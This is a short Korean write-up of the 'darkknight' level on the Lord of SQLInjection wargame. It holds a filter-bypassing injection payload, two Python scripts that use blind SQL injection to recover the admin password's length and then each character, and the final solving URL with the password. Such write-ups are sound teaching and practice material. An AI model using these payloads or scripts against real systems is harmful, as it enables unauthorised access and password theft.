pw -> single quote 필터링
no -> prob _ . () single quote substr ascii = 필터링
대충 이런식으로 익스하면 되겠다.
?pw=0&no=1 or id like "admin"%23
1. pw 길이 구하기
import requests
i=0
cookies = {"PHPSESSID":""}
while True:
url = f"https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=0&no=1%20or%20id%20like%20%22admin%22%20and%20length(pw)%20like%20{i}%23"
res = requests.get(url, cookies=cookies)
if "Hello admin" in res.text:
print('pw length : ',i)
break
i+=1
2. pw 하나하나 구하기
import requests
import threading
cookies = {"PHPSESSID":""}
def func(i):
for c in range(48, 123):
url = f"https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=0&no=1%20or%20id%20like%20%22admin%22%20and%20right(left(pw,{i}),1)%20like%20char({c})%23"
res = requests.get(url, cookies=cookies)
if "Hello admin" in res.text:
print('index:',i, ' char: ',chr(c))
return
for i in range(1, 9):
thread = threading.Thread(target=func, args=(i,))
thread.start()
0b70ea1f
https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=0b70ea1f&no=1%20or%20id%20like%20%22admin%22%20%26%26%20pw%20like%20%220b70ea1f%22%23
댓글